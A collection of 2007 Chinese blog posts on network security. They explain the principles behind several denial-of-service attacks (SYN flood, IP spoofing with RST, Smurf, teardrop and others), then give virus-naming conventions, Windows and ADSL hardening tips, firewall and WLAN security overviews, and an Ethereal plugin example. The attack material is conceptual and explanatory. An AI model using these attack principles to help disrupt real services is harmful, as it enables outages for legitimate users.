noreply@blogger.com (Eric White) — Wed, 18 Jul 2007 10:11:00 +0000

2007真不愧是黑客年,这两天很多客户来电称被拒绝服务,这样的事情的确是非常麻烦,不过现在的情况来看更多的攻击则来自有商业利益的攻击行为，这不得不值得我们去思考。

拒绝服务攻击即攻击者想办法让目标机器停止提供服务或资源访问。这些资源包括磁盘空间、内存、进程甚至网络带宽，从而阻止正常用户的访问。其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分，只要能够对目标造成麻烦，使某些服务被暂停甚至主机死机，都属于拒绝服务攻击。拒绝服务攻击问题也一直得不到合理的解决，究其原因是因为这是由于网络协议本身的安全缺陷造成的，从而拒绝服务攻击也成为了攻击者的终极手法。

攻击者进行拒绝服务攻击，实际上让服务器实现两种效果：一是迫使服务器的缓冲区满，不接收新的请求；二是使用IP欺骗，迫使服务器把合法用户的连接复位，影响合法用户的连接。

接下来了解一下几种常见的拒绝服务攻击的原理：

1．SYN Foold
SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(Distributed Denial Of Service分布式拒绝服务攻击)的方式之一，这是一种利用TCP协议缺陷，发送大量伪造的TCP连接请求，使被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。

SYN Flood攻击的过程在TCP协议中被称为三次握手(Three-way Handshake)，而SYN Flood拒绝服务攻击就是通过三次握手而实现的。

(1) 攻击者向被攻击服务器发送一个包含SYN标志的TCP报文，SYN(Synchronize)即同步报文。同步报文会指明客户端使用的端口以及TCP连接的初始序号。这时同被攻击服务器建立了第一次握手。

(2) 受害服务器在收到攻击者的SYN报文后，将返回一个SYN+ACK的报文，表示攻击者的请求被接受，同时TCP序号被加一，ACK(Acknowledgement)即确认，这样就同被攻击服务器建立了第二次握手。

(3) 攻击者也返回一个确认报文ACK给受害服务器，同样TCP序列号被加一，到此一个TCP连接完成，三次握手完成。

具体原理是：TCP连接的三次握手中，假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成)，这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接。这段时间的长度我们称为SYN Timeout，一般来说这个时间是分钟的数量级(大约为30秒~2分钟)；一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题，但如果有一个恶意的攻击者大量模拟这种情况(伪造IP地址)，服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源。即使是简单的保存并遍历也会消耗非常多的CPU时间和内存，何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大，最后的结果往往是堆栈溢出崩溃—— 既使服务器端的系统足够强大，服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小)，此时从正常客户的角度看来，服务器失去响应，这种情况就称作：服务器端受到了SYN Flood攻击(SYN洪水攻击)。

2．IP欺骗DOS攻击
这种攻击利用RST位来实现。假设现在有一个合法用户(61.61.61.61)已经同服务器建立了正常的连接，攻击者构造攻击的TCP数据，伪装自己的IP为61.61.61.61，并向服务器发送一个带有RST位的TCP数据段。服务器接收到这样的数据后，认为从61.61.61.61发送的连接有错误，就会清空缓冲区中建立好的连接。这时，如果合法用户61.61.61.61再发送合法数据，服务器就已经没有这样的连接了，该用户就必须从新开始建立连接。攻击时，攻击者会伪造大量的IP地址，向目标发送RST数据，使服务器不对合法用户服务，从而实现了对受害服务器的拒绝服务攻击。

3. UDP洪水攻击
攻击者利用简单的TCP/IP服务，如Chargen和Echo来传送毫无用处的占满带宽的数据。通过伪造与某一主机的Chargen服务之间的一次的UDP连接，回复地址指向开着Echo服务的一台主机，这样就生成在两台主机之间存在很多的无用数据流，这些无用数据流就会导致带宽的服务攻击。

4. Ping洪流攻击
由于在早期的阶段，路由器对包的最大尺寸都有限制。许多操作系统对TCP/IP栈的实现在ICMP包上都是规定64KB，并且在对包的标题头进行读取之后，要根据该标题头里包含的信息来为有效载荷生成缓冲区。当产生畸形的，声称自己的尺寸超过ICMP上限的包也就是加载的尺寸超过64K上限时，就会出现内存分配错误，导致TCP/IP堆栈崩溃，致使接受方死机。

5. 泪滴(teardrop)攻击
泪滴攻击是利用在TCP/IP堆栈中实现信任IP碎片中的包的标题头所包含的信息来实现自己的攻击。IP分段含有指明该分段所包含的是原包的哪一段的信息，某些TCP/IP(包括service pack 4以前的NT)在收到含有重叠偏移的伪造分段时将崩溃。

6. Land攻击
Land攻击原理是：用一个特别打造的SYN包，它的原地址和目标地址都被设置成某一个服务器地址。此举将导致接受服务器向它自己的地址发送SYN-ACK消息，结果这个地址又发回ACK消息并创建一个空连接。被攻击的服务器每接收一个这样的连接都将保留，直到超时，对Land攻击反应不同，许多UNIX实现将崩溃，NT变的极其缓慢(大约持续5分钟)。

7. Smurf攻击
一个简单的Smurf攻击原理就是：通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求(ping)数据包来淹没受害主机的方式进行。最终导致该网络的所有主机都对此ICMP应答请求作出答复，导致网络阻塞。它比ping of death洪水的流量高出1或2个数量级。更加复杂的Smurf将源地址改为第三方的受害者，最终导致第三方崩溃。

8.Fraggle攻击
原理：Fraggle攻击实际上就是对Smurf攻击作了简单的修改，使用的是UDP应答消息而非ICMP。

关于病毒命名规则的说明

noreply@blogger.com (Eric White) — Tue, 17 Jul 2007 15:58:00 +0000

很多时候大家已经用杀毒软件查出了自己的机子中了例如Backdoor. RmtBomb.12 、Trojan.Win32.SendIP.15 等等这些一串英文还带数字的病毒名，这时有些人就懵了，那么长
一串的名字，我怎么知道是什么病毒啊？

其实只要我们掌握一些病毒的命名规则，我们就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些公有的特性了。

世界上那么多的病毒，反病毒公司为了方便管理，他们会按照病毒的特性，将病毒进行分类命名。虽然每个反病毒公司的命名规则都不太一样，但大体都是采用一个统一的命名方法来命名的。

一般格式为：<病毒前缀>.<病毒名>.<病毒后缀> 。

病毒前缀是指一个病毒的种类，他是用来区别病毒的种族分类的。不同的种类的病毒，其前缀也是不同的。比如我们常见的木马病毒的前缀 Trojan ，蠕虫病毒的前缀是 Worm 等等还有其他的。

病毒名是指一个病毒的家族特征，是用来区别和标识病毒家族的，如以前著名的CIH病毒的家族名都是统一的“ CIH ”，还有近期闹得正欢的振荡波蠕虫病毒的家族名是“ Sasser ”。

病毒后缀是指一个病毒的变种特征，是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示，如Worm.Sasser.b就是指振荡波蠕虫病毒的变种B，因此一般称为 “振荡波B变种”或者“振荡波变种B”。如果该病毒变种非常多（也表明该病毒生命力顽强 ^_^），可以采用数字与字母混合表示变种标识。

综上所述，一个病毒的前缀对我们快速的判断该病毒属于哪种类型的病毒是有非常大的帮助的。通过判断病毒的类型，就可以对这个病毒有个大概的评估（当然这需要积累一些常见病毒类型的相关知识，这不在本文讨论范围）。而通过病毒名我们可以利用查找资料等方式进一步了解该病毒的详细特征。病毒后缀能让我们知道现在在你机子里呆着的病毒是哪个变种。

下面附带一些常见的病毒前缀的解释（针对我们用得最多的Windows操作系统）：

1、系统病毒

系统病毒的前缀为：Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件，并通过这些文件进行传播。如CIH病毒。

2、蠕虫病毒

蠕虫病毒的前缀是：Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播，很大部分的蠕虫病毒都有向外发送带毒邮件，阻塞网络的特性。比如冲击波（阻塞网络），小邮差（发带毒邮件）等。

3、木马病毒、黑客病毒

木马病毒其前缀是：Trojan，黑客病毒前缀名一般为 Hack 。木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏，然后向外界泄露用户的信息，而黑客病毒则有一个可视的界面，能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的，即木马病毒负责侵入用户的电脑，而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马 Trojan.QQ3344 ，还有大家可能遇见比较多的针对网络游戏的木马病毒如 Trojan.LMir.PSW.60 。这里补充一点，病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能（这些字母一般都为“密码”的英文“password”的缩写）一些黑客程序如：网络枭雄（Hack.Nether.Client）等。

4、脚本病毒

脚本病毒的前缀是：Script。脚本病毒的公有特性是使用脚本语言编写，通过网页进行的传播的病毒，如红色代码（Script.Redlof）。脚本病毒还会有如下前缀：VBS、JS（表明是何种脚本编写的），如欢乐时光（VBS.Happytime）、十四日（Js.Fortnight.c.s）等。

5、宏病毒

其实宏病毒是也是脚本病毒的一种，由于它的特殊性，因此在这里单独算成一类。宏病毒的前缀是：Macro，第二前缀是：Word、Word97、Excel、Excel97（也
许还有别的）其中之一。凡是只感染WORD97及以前版本WORD文档的病毒采用Word97做为第二前缀，格式是：Macro.Word97；凡是只感染WORD97以后版本WORD文档的病毒采用Word做为第二前缀，格式是：Macro.Word；凡是只感染EXCEL97及以前版本EXCEL文档的病毒采用Excel97做为第二前缀，格式是：Macro.Excel97；凡是只感染EXCEL97以后版本EXCEL文档的病毒采用Excel做为第二前缀，格式是：Macro.Excel，依此类推。该类病毒的公有特性是能感染OFFICE系列文档，然后通过OFFICE通用模板进行传播，如：著名的美丽莎(Macro.Melissa)。

6、后门病毒

后门病毒的前缀是：Backdoor。该类病毒的公有特性是通过网络传播，给系统开后门，给用户电脑带来安全隐患。如54很多朋友遇到过的IRC后门Backdoor.IRCBot 。

7、病毒种植程序病毒

这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下，由释放出来的新病毒产生破坏。如：冰河播种者（Dropper.BingHe2.2C）、MSN射手(Dropper.Worm.Smibag)等。

8．破坏性程序病毒

破坏性程序病毒的前缀是：Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒便会直接对用户计算机产生破坏。如：格式化C盘（Harm.formatC.f）、杀手命令（Harm.Command.Killer）等。

9．玩笑病毒

玩笑病毒的前缀是：Joke。也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒会做出各种破坏操作来吓唬用户，其实病毒并没有对用户电脑进行任何破坏。如：女鬼（Joke.Girlghost）病毒。

10．捆绑机病毒

捆绑机病毒的前缀是：Binder。这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来，表面上看是一个正常的文件，当用户运行这些捆绑病毒时，会表面上运行这些应用程序，然后隐藏运行捆绑在一起的病毒，从而给用户造成危害。如：捆绑QQ（Binder.QQPass.QQBin）、系统杀手（Binder.killsys）等。

以上为比较常见的病毒前缀，有时候我们还会看到一些其他的，但比较少见，这里简单提一下：

DoS：会针对某台主机或者服务器进行DoS攻击；

Exploit：会自动通过溢出对方或者自己的系统漏洞来传播自身，或者他本身就是一个用于Hacking的溢出工具；

HackTool：黑客工具，也许本身并不破坏你的机子，但是会被别人加以利用来用你做替身去破坏别人。

你可以在查出某个病毒以后通过以上所说的方法来初步判断所中病毒的基本情况，达到知己知彼的效果。在杀毒无法自动查杀，打算采用手工方式的时候这些信息会给你很大的帮助。

无法打开.exe可执行文件问题解决方案

noreply@blogger.com (Eric White) — Mon, 16 Jul 2007 12:59:00 +0000

电脑出现在如题所说的问题，点击我的电脑的属性弹出一个对话框说“无法找到C:\WINDOWS\system32\rundll32.exe”，后来想打开一些已经安装的软件程序却弹出一个要你选择打开方式的对话框，后来发现杀毒软件也不见了，更令我吃惊的是居然无法安装文件！怎么办呢？
　　解决方法：对于exe打开方式被木马或病毒修改，无法打开任何可执行文件的解决办法。

　　方案一：先将regedit.exe改名为regedit.com或regedit.scr。

　　运行regedit.com，找到hkey_classes_root\exefile\shell\Open\command键值，将默认值改为%1 %*重启，再将regedit.com改回regedit.exe即可。

　　方案二：将下面的内容存为exefile.reg，双击导入注册表；或在纯dos下运行regedit exefile.reg，导入注册表即可。（注意：regedit4后面留一空行）

　　regedit4

　　[hkey_classes_root\exefile\shell\Open\command]<br>@=\%1\ %*

　　方案三（只适用于win2000/xp）：

　　1、将cmd.exe改名为cmd.com或cmd.scr。
　　2、运行cmd.com
　　3、运行下面两个命令：ftype exefile=%1 %*assoc .exe=exefile
　　4、将cmd.com改回cmd.exe

　　方案四：从新关联EXE文件。打开任意窗口（非IE窗口），工具---文件夹选项----文件类型----新建————在“文件扩展名”中填入“EXE”-----点击高级，在下拉菜单中选“应用程序”-------确定。

ADSL路由器防止黑客攻击

noreply@blogger.com (Eric White) — Sun, 15 Jul 2007 15:32:00 +0000

目前，使用ADSL的用户越来越多，由于ADSL用户在线时间长、速度快，因此成为黑客们的攻击目标。现在网上出现了各种越来越详细的“IP地址库”，要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢？不妨看看以下方法。

一、取消文件夹隐藏共享

如果你使用了Windows 2000/XP系统，右键单击C盘或者其他盘，选择

"共享"，你会惊奇地发现它已经被设置为“共享该文件夹”，而在“网上邻居”中却看不到这些内容，这是怎么回事呢？

原来，在默认状态下，Windows 2000/XP会开启所有分区的隐藏共享，从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”，就可以看到硬盘上的每个分区名后面都加了一个“$”。但是只要键入“计算机名或者IPC$”，系统就会询问用户名和密码，遗憾的是，大多数个人用户系统Administrator的密码都为空，入侵者可以轻易看到C盘的内容，这就给网络安全带来了极大的隐患。

怎么来消除默认共享呢？方法很简单，打开注册表编辑器，进入“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetSevicesLanmanworkstationparameters”，新建一个名为“AutoShareWKs”的双字节值，并将其值设为“0”，然后重新启动电脑，这样共享就取消了。

二、拒绝恶意代码

恶意网页成了宽带的最大威胁之一。以前使用Modem，因为打开网页的速度慢，在完全打开前关闭恶意网页还有避免中招的可能性。现在宽带的速度这么快，所以很容易就被恶意网页攻击。

一般恶意网页都是因为加入了用编写的恶意代码才有破坏力的。这些恶意代码就相当于一些小程序，只要打开该网页就会被运行。所以要避免恶意网页的攻击只要禁止这些恶意代码的运行就可以了。

运行IE浏览器，点击“工具/Internet选项/安全/自定义级别”，将安全级别定义为“安全级-高”，对“ActiveX控件和插件”中第2、3项设置为“禁用”，其它项设置为“提示”，之后点击“确定”。这样设置后，当你使用IE浏览网页时，就能有效避免恶意网页中恶意代码的攻击。

三、封死黑客的“后门”

俗话说“无风不起浪”，既然黑客能进入，那说明系统一定存在为他们打开的“后门”，只要堵死这个后门，让黑客无处下手，便无后顾之忧！

1.删掉不必要的协议

对于服务器和主机来说，一般只安装TCP/IP协议就够了。鼠标右击“网络邻居”，选择“属性”，再鼠标右击“本地连接”，选择“属性”，卸载不必要的协议。其中NETBIOS是很多安全缺陷的根源，对于不需要提供文件和打印共享的主机，还可以将绑定在TCP/IP协议的NETBIOS关闭，避免针对NETBIOS的攻击。选择“TCP/IP协议/属性/高级”，进入“高级TCP/IP设置”对话框，选择“WINS”标签，勾选“禁用TCP/IP上的NETBIOS”一项，关闭NETBIOS。

2.关闭“文件和打印共享”

文件和打印共享应该是一个非常有用的功能，但在不需要它的时候，也是黑客入侵的很好的安全漏洞。所以在没有必要“文件和打印共享”的情况下，我们可以将它关闭。用鼠标右击“网络邻居”，选择“属性”，然后单击“文件和打印共享”按钮，将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。

虽然“文件和打印共享”关闭了，但是还不能确保安全，还要修改注册表，禁止它人更改“文件和打印共享”。打开注册表编辑器，选择“HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesNetWork”主键，在该主键下新建DWORD类型的键值，键值名为“NoFileSharingControl”，键值设为“1”表示禁止这项功能，从而达到禁止更改“文件和打印共享”的目的；键值为“0”表示允许这项功能。这样在“网络邻居”的“属性”对话框中“文件和打印共享”就不复存在了。

3.把Guest账号禁用

有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具，那还是禁止的好。打开控制面板，双击“用户和密码”，单击“高级”选项卡，再单击“高级”按钮，弹出本地用户和组窗口。在Guest账号上面点击右键，选择属性，在“常规”页中选中“账户已停用”。另外，将Administrator账号改名可以防止黑客知道自己的管理员账号，这会在很大程度上保证计算机安全。

4.禁止建立空连接

在默认的情况下，任何用户都可以通过空连接连上服务器，枚举账号并猜测密码。因此，我们必须禁止建立空连接。方法有以下两种：

方法一是修改注册表：打开注册表“HKEY_LOCAL_MACHINESystemCurrentControlSetControlLSA”，将DWORD值“RestrictAnonymous”的键值改为“1”即可。

最后建议大家给自己的系统打上补丁，微软那些没完没了的补丁还是很有用的！

分布式防火墙的应用部署外盗家贼一起防

noreply@blogger.com (Eric White) — Sat, 14 Jul 2007 10:53:00 +0000

随着广电网络的不断发展，我们创办了丰富多彩的具有广电特色的门户网站，但随之而来的网络安全问题也日益受到了我们的关注，为了保证网站的安全正常运行，网络管理员利用防火墙、路由器等网络产品进行安全防护，这些客观上起到了防止“外界”的攻击和入侵的作用，但是这种传统的防火墙技术(俗称边界防火墙)能够阻止来自外部的大部分攻击，对于局域内部的入侵则形同虚设。为此，诞生了一种专用于隔离、堵住内部网漏的新兴防火墙技术——分布式防火墙。

　　一、分布式防火墙的技术特点

　　 1.1主机驻留

　　分布式防火墙的最主要特点就是采用主机驻留方式，所以称之为“主机防火墙”，它的重要特征是驻留在被保护的主机上，该主机以外的网络不管是处在网络内部还是网络外部都认为是不可信任的，因此可以针对该主机上运行的具体应用和对外提供的服务设定针对性很强的安全策略。主机防火墙对分布式防火墙体系结构的突出贡献是，使安全策略不仅仅停留在网络与网络之间，而是把安全策略推广延伸到每个网络末端。

　　 1.2嵌入操作系统内核

　　这主要是针对目前的纯软件式分布式防火墙来说的，为了自身的安全和彻底堵住操作系统的漏洞，主机防火墙的安全监测核心引擎要以嵌人操作系统内核的形态运行，直接接管网卡，在把所有数据包进行检查后再提交操作系统。不能实现这种分布式运行模式的主机防火墙由于受到操作系统安全性的制约，存在着明显的安全隐患。

　　 1.3 类似于个人防火墙

　　个人防火墙是一种软件防火墙产品，它是在分布式防火墙之前业已出现的一类防火墙产品，它是用来保护单一主机系统的。分布式针对桌面应用的主机防火墙与个人防火墙有相似之处，如它们都对应个人系统，但其差别又是本质性的。首先它们管理方式迥然不同，个人防火墙的安全策略由系统使用者自己设置，目标是防外部攻击，而针对桌面应用的主机防火墙的安全策略由整个系统的管理员统一安排和设置，除了对该桌面机起到保护作用外，也可以对该桌面机的对外访问加以控制，并且这种安全机制是桌面机的使用者不可见和不可改动的。

　　其次，不同于个人防火墙面向个人用户，针对桌面应用的主机防火墙是面向企业级客户的，它与分布式防火墙其它产品共同构成一个企业级应用方案，形成一个安全策略中心统一管理，安全检查机制分散布置的分布式防火墙体系结构。

　　二、分布式防火墙的结构与原理

　　 2.1分布式防火墙结构

　　典型的分布式防火墙系统结构由三部分组成：

　　 (1)策略语言：用来说明哪些连接是允许的，哪些连接是禁止的。比如KeyNote就是一种常用的策略描述语言。使用策略描述语言来制定策略，并编译成内部形式存储于策略数据库中，系统管理工具将策略发布到各个终端，各终端根据这些策略对数据包进行过滤。

　　 (2)系统管理工具：用来将形成的策略文件分发给被防火墙保护的所有主机。这里所指的防火墙并不是传统意义上的边界防火墙，而是逻辑上的分布式防火墙。

(3)IP安全协议：IPSEC是一种对TCP／IP协议族的网络加密保护机制，它为IP层提供了安全服务，用来保护一条或多条主机与主机之间、安全网关与安全网关之间、安全网关与主机之间的路径。IP安全协议中的密码凭证为主机提供了可靠的、唯一的标志，并且与网络的物理拓扑结构无关，通常用密码凭证来标志各个主机。

　　在分布式防火墙工作时，首先由制定防火墙接入控制的策略中心，通过编译器将策略语言的描述转换成内部格式，形成策略文件，然后策略中心采用系统管理工具把策略文件分发给各台“内部”主机，“内部”主机将从IP安全协议和策略文件两个方面来判断是否接受收到的数据包。
　　三．分布式防火墙在广电网应用的优越性

　　 3．1保证了WEB服务器系统的安全性

　　分布式防火墙增加了针对主机的入侵监测和防护功能，特别加强了对来自广电网内部攻击的防范，可以实施全方位的安全策略，提供了多层次立体的防范体系，确保了广电门户网站系统安全、稳定运行。

　　 3．2系统的易于扩展性

　　分布式防火墙能提高系统性能，消除系统因结构性限制产生的瓶颈问题。分布式防火墙有效地解决了主机托管后，跨地区网络使用和管理的不安全性。分布式防火墙最重要的优势在于，它能够保护物理拓扑上属于内部网络，但位于逻辑上的“内部”网络的那些主机，这种需求随着VPN的发展越来越多。

　　对于这个问题的传统处理方法是：将远程“内部” 主机和外部主机的通信依然通过防火墙隔离来控制接入，而远程“内部”主机和防火墙之间采用隧道技术保证安全性。这种方法使原本可直接通信的双方必须绕经防火墙，不仅效率低而且增加了防火墙过滤规则设置的难度。

　　与之相反，分布式防火墙的建立本身就是基于逻辑网络的概念，因此对它而言，远程“内部”主机与物理上的内部主机没有任何区别，它从根本上防止了这种情况的发生。

　　 3．3系统性能的保证

　　传统的边界防火墙由于单一的接入控制点，无论对网络的安全性还是对网络的可靠性都有不利的影响。虽然目前也有这方面的研究并提出了一些相应的解决方案，如自适应防火墙技术，但是从网络性能角度来说，自适应防火墙只不过是一种在网络性能和网络安全之间寻求平衡的方案；从网络可靠性角度来说，采用多个防火墙冗余也是一种可行的方案，但是它们不仅引入了很多复杂性，而且并没有从根本上解决该问题。分布式防火墙则从根本上去除了单一的接入点，使此问题迎刃而解。更为重要的是，分布式防火墙技术消除了网络的结构性瓶颈问题，提高了系统性能。

WLAN安全锦囊妙计

noreply@blogger.com (Eric White) — Fri, 13 Jul 2007 07:25:00 +0000

无线局域网的安全技术在不断地发展，研究人员正在将各种已有的和新出现的安全技术尝试应用于WLAN环境，力求找到安全高效的解决方案。

无论是WEP、WPA还是WAPI与802.11i，想必都不能单独解决无线局域网的安全问题，如何与现有的安全技术结合应用，最大限度地确保WLAN的安全势在必行。

合理配置是前提

合理配置无线局域网是确保安全的首要前提，主要包括：

* 改变ESSID的缺省值，使用不易被猜到的ESSID号；

*关闭对ESSID的定期广播，这样设置之后，虽然客户机必须发送探测帧以询问ESSID，但入侵者则需借助一些无线数据包捕获及分析工具，增加了窃听难度；

*改变缺省密钥并定期更换；

* 在网络规模较小且用户相对固定的场合使用MAC地址过滤来控制客户的访问。

加强客户端的防御

客户端的数据同样是不法分子觊觎的对象，加强防御也是保证WLAN安全的有效措施之一。在客户端可以通过以下三种方法保证数据的安全：

* 使用口令及个人防火墙，防止对客户机的驱动器和文件夹的非授权访问；

* 通信过程使用一次一密的会话密钥，因为密钥频繁改变，窃听者难以获得足够的数据以破解密钥；

* 选择具有强加密算法的、基于应用层的第三方加密软件，可以绕过对Wi-Fi的各种攻击，保证数据不被解密。

抵御对内部网的攻击

在无线局域网与内部有线局域网相连通的环境，由于WLAN的不安全会殃及内部有线网，因此采取相应的抵御策略也是不可忽视的环节。使用企业级防火墙将AP（接入点）置于防火墙之外，只让IP或MAC地址合法的用户进入内部网，再配以VPN（Virtual Private Networking虚拟专网）功能，既可使出差在外和在家办公的员工通过Internet访问内部有线网，又可以阻止通过WLAN对内部网的非授权访问。在这种应用中，通过无线访问内部网的企图被防火墙及VPN服务器隔离，同时，VPN服务器提供鉴别服务，而支持完全加密且基于VPN的方案易于扩展，能够做到支持大量用户。

加强检测与鉴别

在网络中加入RADIUS（Remote Authentication Dial-in User Service，远程鉴定拨入用户服务）服务器，实现客户与AP间的相互鉴别，进而做到检测和隔离欺诈性AP。RADIUS服务器可以同时承担VPN服务器的任务，同时使用基于端口的鉴定标准802.lx，通过访问中心数据库对多种服务客户（如VPN客户及普通无线客户）进行鉴别。

网络管理不可忽视

除解决好上述安全策略之外，网络管理也是确保安全的有效措施。对于网络管理者而言，如果知道所有合法用户的MAC和IP地址，使用入侵检测工具（也是黑客常用的工具）定期扫描搜索便可发现非法用户。此外，使用静态IP地址在一定程度上也可以防止对无线网的非授权访问。因为使用DHCP服务器动态配置IP地址的网络会给一个“偷来”的ESSID配置一个合法的IP地址。

综上所述，由于无线局域网安全机制本身固有的安全脆弱性及无线传输介质特有的开放性和穿透性，如果再加上安装实施或使用过程中的疏漏，其安全性将变得十分脆弱。为了保证无线局域网的数据安全，除了安装配置和管理上应加强防范之外，用户端同样要加强防范。使用口令及个人防火墙可防止数据被非授权访问；对于安全级别要求较高且无线网又与内部有线网相连的场合，可以使用企业级防火墙并配以VPN和RADIUS；对高度敏感的数据使用第三方的、基于应用层的强加密算法对数据进行加密，可以绕过各种对无线网的有效攻击。只有确保无线网应用各环节的安全，才能充分发挥无线网的优越性。

网络协议：Ethereal协议分析系统介绍

noreply@blogger.com (Eric White) — Thu, 12 Jul 2007 10:20:00 +0000

Ethereal是一个开放源码的网络分析系统，也是是目前最好的开放源码的网络协议分析器，支持Linux和windows平台。
Ethereal起初由Gerald Combs开发，随后由一个松散的Etheral团队组织进行维护开发。它目前所提供的强大的协议分析功能完全可以媲美商业的网络分析系统，自从1998年发布最早的0.2版本至今，大量的志愿者为Ethereal添加新的协议解析器，如今Ethereal已经支持五百多种协议解析。很难想象如此多的人开发的代码可以很好的融入系统中；并且在系统中加入一个新的协议解析器很简单，一个不了解系统的结构的新手也可以根据留出的接口进行自己的协议开发。这都归功于Ehereal良好的设计结构。事实上由于网络上各种协议种类繁多，各种新的协议层出不穷。一个好的协议分析器必需有很好的可扩展性和结构。这样才能适应网络发展的需要不断加入新的协议解析器。

1 Ethereal的捕包平台
　　网络分析系统首先依赖于一套捕捉网络数据包的函数库。这套函数库工作在在网络分析系统模块的最底层。作用是从网卡取得数据包或者根据过滤规则取出数据包的子集，再转交给上层分析模块。从协议上说，这套函数库将一个数据包从链路层接收，至少将其还原至传输层以上，以供上层分析。
在Linux系统中， 1992年Lawrence Berkeley Lab的Steven McCanne和Van Jacobson提出了包过滤器的一种的实现，BPF（BSD Packet Filter）。Libpcap是一个基于BPF的开放源码的捕包函数库。现有的大部分Linux捕包系统都是基于这套函数库或者是在它基础上做一些针对性的改进
　　在window系统中，意大利人Fulvio Risso和Loris Degioanni提出并实现了Winpcap函数库，作者称之为NPF。由于NPF的主要思想就是来源于BPF，它的设计目标就是为windows
　　系统提供一个功能强大的开发式数据包捕获平台，希望在Linux系统中的网络分析工具经过简单编译以后也可以移植到windows中，因此这两种捕包架构是非常现实的。就实现来说提供的函数调用接口也是一致的。
　　Ethereal网络分析系统也需要一个底层的抓包平台，在Linux中是采用Libpcap函数库抓包，在windows系统中采用winpcap函数库抓包

2层次化的数据包协议分析方法
　　取得捕包函数捕回的数据包后就需要进行协议分析和协议还原工作了。由于OSI的7层协议模型，协议数据是从上到下封装后发送的。对于协议分析需要从下至上进行。首先对网络层的协议识别后进行组包还原然后脱去网络层协议头。将里面的数据交给传输层分析，这样一直进行下去直到应用层
Ip
| \
Tcp udp
| \
HTTP TFTP
　　由于网络协议种类很多，就Ethereal所识别的500多种协议来说，为了使协议和协议间层次关系明显。从而对数据流里的各个层次的协议能够逐层处理。Ethereal系统采用了协议树的方式。上图就是一个简单的协议树。如果协议A的所有数据都是封装在协议B里的，那么这个协议A就是协议B是另外一个协议的儿子节点。我们将最低层的无结构数据流作为根接点。那么具有相同父节点的协议成为兄弟节点。那么这些拥有同样父协议兄弟节点协议如何互相区分了？Ethereal系统采用协议的特征字来识别。每个协议会注册自己的特征字。这些特征字给自己的子节点协议提供可以互相区分开来的标识。比如tcp协议的port字段注册后。 Tcp.port=21就可以认为是ftp协议，特征字可以是协议规范定义的任何一个字段。比如ip协议就可以定义proto字段为一个特征字。
　　在Ethereal中注册一个协议解析器首先要指出它的父协议是什么。另外还要指出自己区别于父节点下的兄弟接点协议的特征。比如ftp协议。在Ethereal中他的父接点是tcp协议，它的特征就是tcp协议的port字段为21。
　　这样当一个端口为21的tcp数据流来到时。首先由tcp协议注册的解析模块处理，处理完之后通过查找协议树找到自己协议下面的子协议，判断应该由那个子协议来执行，找到正确的子协议后，就转交给ftp注册的解析模块处理。这样由根节点开始一层层解析下去。
　　由于采用了协议树加特征字的设计，这个系统在协议解析上由了很强的扩展性，增加一个协议解析器只需要将解析函数挂到协议树的相应节点上即可。

3 基于插件技术的协议分析器
　　所谓插件技术，就是在程序的设计开发过程中，把整个应用程序分成宿主程序和插件两个部分，宿主程序与插件能够相互通信，并且，在宿主程序不变的情况下，可以通过增减插件或修改插件来调整应用程序的功能。运用插件技术可以开发出伸缩性良好、便于维护的应用程序。它著名的应用实例有：媒体播放器winamp、微软的网络浏览器ie等。
　　由于现在网络协议种类繁多，为了可以随时增加新的协议分析器，一般的协议分析器都采用插件技术，这样如果需要对一个新的协议分析只需要开发编写这个协议分析器并调用注册函数在系统注册就可以使用了。通过增加插件使程序有很强的可扩展性，各个功能模块内聚。
　　在协议分析器中新增加一个协议插件一般需要插件安装或者注册，插件初始化，插件处理3个步骤，下面以Ethereal为例进行分析如何利用插件技术新增加一个协议分析模块。
　　Ethereal由于采用插件技术，一个新加入开发的程序员开发一种新的协议分析模块的时候不需要了解所有的代码，他只需要写好这个协议模块的函数后，写一个格式为proto_reg_handoff_XXX的函数，在函数内调用注册函数告诉系统在什么时候需要调用这个协议模块。比如
　　你事先写好了一个名为dissect_myprot的协议解析模块，它是用来解析tcp协议端口为250的数据。可以利用这些语句来将这个解析器注册到系统中
proto_reg_handoff_myprot(void)
{
dissector_handle_t myprot_handle;

myprot_handle = create_dissector_handle(dissect_myprot,
proto_myprot);
dissector_add("tcp.port", 250, myprot_handle);
}
这段代码告诉系统当tcp协议数据流端口为250的时候要调用dissect_myprot这个函数模块。
